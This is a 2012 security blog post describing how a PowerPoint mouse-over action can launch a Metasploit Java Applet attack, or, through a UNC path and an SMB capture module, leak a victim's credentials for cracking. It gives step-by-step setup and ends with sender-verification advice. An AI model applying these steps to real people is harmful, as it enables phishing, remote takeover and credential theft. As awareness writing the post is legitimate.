Attack with Power... Point That Is

Thursday, August 16, 2012



There have been all kinds of document attacks, but what about PowerPoint?

It turns out that PowerPoint makes it easy for an attacker to turn the innocent slideshows into a nasty little attack. The attack involves 4 simple steps, make a slideshow, make an action, rename the file and distribute it.

First things first, you need to make a slideshow. Design it anyway you want, pick the slide or slides you want to use the action on. Make a new text box and drag the box to cover the whole page.

Click on insert -> actions -> mouse over. Then click the hyperlink button and select URL. Enter the desired URL, click OK and save the PowerPoint. In figure 1 I have entered a URL that is already set up for the Java Applet attack. This can be done with Metasploit or the Social Engineering Toolkit.

(click image to enlarge)

Figure 1

If we were to send this to a target as is it would work only when they started the slide show, in an attempt to circumvent that we can rename the file from a PPT to a PPS (figures 2,3), which is a PowerPoint Slideshow.

When the file is opened it starts as a full screen slide show. Since our attack is launched via a mouse over, when the user attempts to close the document the odds are they will trigger the attack.

(click image to enlarge)

Figure 2

(click image to enlarge)

Figure 3

At this point our malicious web page is opened, and the Java Applet attack commences, as seen in figure 4.

(click image to enlarge)

Figure 4

The user may not even be aware that they triggered the webpage to open; it might be beneficial to have the page appear to be a common webpage such as Gmail or Facebook. If the target decided to hit run we would be given our shell and complete control of the system as shown in figure 5.

(click image to enlarge)

Figure 5

I wanted to see if it was possible to embed a UNC path, turns out it is just as simple. Following the same steps as outlined above but when you select URL enter a UNC path such as \\ipaddress\a.gif and set Metasploit to use the auxiliary/server/capture/smb module for capturing your requests.

As you can see from figure 6 each time the mouse passes over the target area it sends the credentials. Now all you have to do is crack them.

(click image to enlarge)

Figure 6

These attacks are not new, the important part is that PowerPoint does not warn the user. There is no popup asking the user if they want to visit the site and more importantly there is absolutely no warning of the attempted authentication attempt. The user may not even know that they have fallen victim to this attack.

This attack is very difficult to detect, as this is simply using the features of PowerPoint for a malicious purpose. If this type of attack originated from a trusted individual spoofed or even a disgruntled employee it could be absolutely devastating.

My advice is simple; make sure you know the sender. There is nothing wrong with making a phone call and saying “Did you send me this PowerPoint.” Also, if you notice any odd behavior after using a PowerPoint it may warrant further investigation.

Special thanks to my wife and @Jagar

Cross-posted from

Possibly Related Articles:
Viruses & Malware
Information Security
malware Javascript Social Engineering Metasploit Attacks Applet exploit Social Engineering Toolkit PowerPoint
Post Rating I Like this!
The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.

Unauthorized reproduction of this article (in part or in whole) is prohibited without the express written permission of Infosec Island and the Infosec Island member that posted this content--this includes using our RSS feed for any purpose other than personal use.